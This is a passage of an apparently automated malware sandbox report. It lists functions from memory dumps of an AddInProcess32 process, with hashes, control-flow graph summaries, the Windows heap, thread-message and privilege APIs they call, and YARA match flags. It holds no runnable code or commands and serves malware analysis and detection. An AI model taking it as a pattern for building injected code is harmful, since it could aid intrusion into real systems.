                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: eaae07484238b6883173be2a3eaa6db5cad591a31f6741c5a68857b8958e55ee
                                                                                                                                                                                                                                        • Instruction ID: 01b5e32267ecf2c87cfa22f83328561b82f04bdbe8204e38853a35196788a857
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eaae07484238b6883173be2a3eaa6db5cad591a31f6741c5a68857b8958e55ee
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2190026324240007410571584415616500E97E2301B55C021E2018590DC6258A956226
                                                                                                                                                                                                                                        Function 01802AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: f674be096c6658b4fe0c234090efdb084e916c227d96e97b1b33ee894d175d80
                                                                                                                                                                                                                                        • Instruction ID: f540240466e0014c0b17bd654be37648037c51391c2bd6daea7f5532c88c79ef
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f674be096c6658b4fe0c234090efdb084e916c227d96e97b1b33ee894d175d80
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 86900227251400070105B5580705507104A97D7351355C021F2019550CD7218A655222
                                                                                                                                                                                                                                        Function 01802DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: f373815d23d07ecfd002837c312c2a2425dc694b6a4c50c415b7bb7f8a50534d
                                                                                                                                                                                                                                        • Instruction ID: 091abb4d92b2326c2fd46d0f2223881b3e3fb3549aabf72057f83afffaed1f7a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f373815d23d07ecfd002837c312c2a2425dc694b6a4c50c415b7bb7f8a50534d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D0900223282441575545B1584405507500AA7E2341795C012A2418950CC6269A5AD722
                                                                                                                                                                                                                                        Function 01802DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: 9c85606f968a1ea323f6cb81995a01020675cf80c102e57d79822758e7f0e82a
                                                                                                                                                                                                                                        • Instruction ID: 1575940be21992e1347ccf908c99fcb9998a9e118374d73e8dde543702f1da35
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9c85606f968a1ea323f6cb81995a01020675cf80c102e57d79822758e7f0e82a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F90023324140417D11171584505707100D97D2341F95C412A1428558DD7568B56A222
                                                                                                                                                                                                                                        Function 01802D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: 3f869e79f305fd035e7654650a33d5830beb5802d2dc168435e8a33a038baeff
                                                                                                                                                                                                                                        • Instruction ID: 3b4ec45a6a0686b3fede1c0cdc0c39f82a7a1cc22bda9a4fe7a4ffc904d80982
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f869e79f305fd035e7654650a33d5830beb5802d2dc168435e8a33a038baeff
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F390022B25340007D1807158540960A100997D3302F95D415A1019558CCA158A6D5322
                                                                                                                                                                                                                                        Function 01802D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: ae00564115d67cbc86076b53627647f216a520d4d5c741cec6f7b6725e8a2f43
                                                                                                                                                                                                                                        • Instruction ID: c2165c56c0e767e2a50ca45fcfe81bad2d143007545c61e5df0d7bd88794fb58
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae00564115d67cbc86076b53627647f216a520d4d5c741cec6f7b6725e8a2f43
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F90022334140007D140715854196065009E7E3301F55D011E1418554CDA158A5A5323
                                                                                                                                                                                                                                        Function 01802CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: 3882f07176eebf8df29e8f50f1ec0cf90a83a24c7a582a7ad78503e506c74f01
                                                                                                                                                                                                                                        • Instruction ID: 54ce8d643c02b6334b441b10dc74e19fc1223823385c8b3d809a2091c123c952
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3882f07176eebf8df29e8f50f1ec0cf90a83a24c7a582a7ad78503e506c74f01
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4890023324140407D10075985409646100997E2301F55D011A6028555EC7658A956232
                                                                                                                                                                                                                                        Function 01802C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: 3237626a83325ceddc1134234edb77cb2cf9142715f2e338373abb9aa6705451
                                                                                                                                                                                                                                        • Instruction ID: 7cfee75088f2314e818a42fe45221fb139b1fb55e5fe668bbc50c5b9921b7469
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3237626a83325ceddc1134234edb77cb2cf9142715f2e338373abb9aa6705451
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8190023324148807D1107158840574A100997D2301F59C411A5428658DC7958A957222
                                                                                                                                                                                                                                        Function 01802F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: 18d3f74b8df40277baf4832cdefbf5a2209b1a1efaf9e787ef0b12ca357dc8d1
                                                                                                                                                                                                                                        • Instruction ID: 1ffc4036e38e8428dc89f0c7cea8cbc4f5b2cc3378c13abe36405579c0022f7a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 18d3f74b8df40277baf4832cdefbf5a2209b1a1efaf9e787ef0b12ca357dc8d1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DF90023324180407D1007158481570B100997D2302F55C011A2168555DC7258A556672
                                                                                                                                                                                                                                        Function 01802FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: 85c6f0ef2ee7a0c502c8e60d587873698b0c0e1bcaab1a0cb91cad8c24136967
                                                                                                                                                                                                                                        • Instruction ID: 08f15f16e4eb909793a0d8e6f6480ec5d34388eaef856833f41d579679ee2d09
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 85c6f0ef2ee7a0c502c8e60d587873698b0c0e1bcaab1a0cb91cad8c24136967
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80900223641400474140716888459065009BBE3311755C121A199C550DC6598A695766
                                                                                                                                                                                                                                        Function 01802FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: 00f15a1129dfcfb6a64d2242189e1646870866073c9d5bd7beb5449bd4d2f761
                                                                                                                                                                                                                                        • Instruction ID: d15809f37b68935332fcc65db1c123637ee177223ad62905e32cbc6366a44aa8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 00f15a1129dfcfb6a64d2242189e1646870866073c9d5bd7beb5449bd4d2f761
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7C900223251C0047D20075684C15B07100997D2303F55C115A1158554CCA158A655622
                                                                                                                                                                                                                                        Function 01802F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: 0110f3b3ce2cafa9c6426ce67675b4e06d60e79ed3f30c2b10ba96f915621da0
                                                                                                                                                                                                                                        • Instruction ID: b0723fb9b70aa4434ad805de11eb6a565c4c783b681fdb2b9892dcb114f018c5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0110f3b3ce2cafa9c6426ce67675b4e06d60e79ed3f30c2b10ba96f915621da0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4290026338140447D10071584415B061009D7E3301F55C015E2068554DC719CE566227
                                                                                                                                                                                                                                        Function 01802E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: 8abc5cc22acf3135ee78be9ece2d8f70b354a0da5c05196e227751b42a1e137e
                                                                                                                                                                                                                                        • Instruction ID: 44e1f45831643369be0a208f5fa6618d0e2aacac1155d3338f533ef6c414a947
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8abc5cc22acf3135ee78be9ece2d8f70b354a0da5c05196e227751b42a1e137e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE90022364140507D10171584405616100E97D2341F95C022A2028555ECB258B96A232
                                                                                                                                                                                                                                        Function 01802EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: 5ba1e2a7e900dee82e0b137773163a304e47696c5ec3c996505a4aff96d4df2d
                                                                                                                                                                                                                                        • Instruction ID: 9473edc388d21f423c3b34fd17467de8e7ca8a41dfc65576a119a59cc63aff75
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ba1e2a7e900dee82e0b137773163a304e47696c5ec3c996505a4aff96d4df2d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E90027324140407D14071584405746100997D2301F55C011A6068554EC7598FD96766
                                                                                                                                                                                                                                        Function 00409AB0 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 9491f0743c91a206193bdf4875b0116748c1939b63dea1d6f13f2d0be6304ac3
                                                                                                                                                                                                                                        • Instruction ID: 0cf1d1cfbff413d406b9f50454d57ab941c4b3e8ec75440de5a7d7d7e128ebbb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9491f0743c91a206193bdf4875b0116748c1939b63dea1d6f13f2d0be6304ac3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 24210AB2D4020857CB25D664AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                                                                                                                                                                                                                        Function 0041A600 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 6 41a600-41a631 call 41af30 RtlAllocateHeap
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A62D
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                        • String ID: 6EA
                                                                                                                                                                                                                                        • API String ID: 1279760036-1400015478
                                                                                                                                                                                                                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                                                                                        • Instruction ID: 226561cf9c8a986873ffc081809f26ad69fcc4b20f94c9d7be20fabd3b8eb7db
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 24E012B1211208ABDB14EF99CC41EA777ACAF88664F118559BA085B242C630F911CAB0
                                                                                                                                                                                                                                        Function 0041A632 Relevance: 1.6, APIs: 1, Instructions: 65memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 205 41a632-41a638 206 41a6b8-41a708 call 41af30 205->206 207 41a63a-41a654 205->207 208 41a65c-41a671 RtlFreeHeap 207->208 209 41a657 call 41af30 207->209 209->208
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                                                                                                        • Opcode ID: 92435f79e61f077360db84d01eede6748c8cdf0f4aa2ed710ffbdee89db9b342
                                                                                                                                                                                                                                        • Instruction ID: 211b378c4f7c60796f100609e00887de9b7fcce71935e91ba448886450722b43
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92435f79e61f077360db84d01eede6748c8cdf0f4aa2ed710ffbdee89db9b342
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 52116AB6615148AFCB14DF99DC80DEB3BA9AF8C318F15865AF94D97205C230E856CBB0
                                                                                                                                                                                                                                        Function 00408308 Relevance: 1.6, APIs: 1, Instructions: 58threadwindowCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 213 408308-40835a call 41be30 call 41c9d0 call 40acf0 call 414e50 222 40835c-40836e PostThreadMessageW 213->222 223 40838e-408392 213->223 224 408370-40838a call 40a480 222->224 225 40838d 222->225 224->225 225->223
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1836367815-0
                                                                                                                                                                                                                                        • Opcode ID: 209d539bb0c684d2849aca3d28b26021fc5e7a81943369bc078ab30c6ed6bd3c
                                                                                                                                                                                                                                        • Instruction ID: e4a28d64b243b541d6d531637dff334c9966267f07dbf2e742c982f33c9bd668
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 209d539bb0c684d2849aca3d28b26021fc5e7a81943369bc078ab30c6ed6bd3c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E01B93198031877EB21A6659C43FFE7B5C5B41B54F05016EFF44BA1C2DAE8690542EA
                                                                                                                                                                                                                                        Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 228 408310-40831f 229 408328-40835a call 41c9d0 call 40acf0 call 414e50 228->229 230 408323 call 41be30 228->230 237 40835c-40836e PostThreadMessageW 229->237 238 40838e-408392 229->238 230->229 239 408370-40838a call 40a480 237->239 240 40838d 237->240 239->240 240->238
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1836367815-0
                                                                                                                                                                                                                                        • Opcode ID: 1eae49b1dd1fdf1f4ed343fddf3187855c82dbc596373200d6923005f005e771
                                                                                                                                                                                                                                        • Instruction ID: 43d593e10ad008c4695c17d6314bf6f3e92d4c432431edd93db89b762a987e15
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1eae49b1dd1fdf1f4ed343fddf3187855c82dbc596373200d6923005f005e771
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2018471A8032877E720A6959D43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                                                                                                                                                                                                                        Function 0041A640 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 270 41a640-41a671 call 41af30 RtlFreeHeap
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                                                                                                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                                                                                        • Instruction ID: 3f65de21c9b51a2b7742007d51c6b1fad19b07b0b1b2c98d2bb582ee848745b4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1EE046B1210208ABDB18EF99CC49EE777ACEF88764F018559FE085B242C630F911CAF0
                                                                                                                                                                                                                                        Function 0041A798 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 273 41a798-41a7ba call 41af30 275 41a7bf-41a7d4 LookupPrivilegeValueW 273->275
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7D0
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3899507212-0
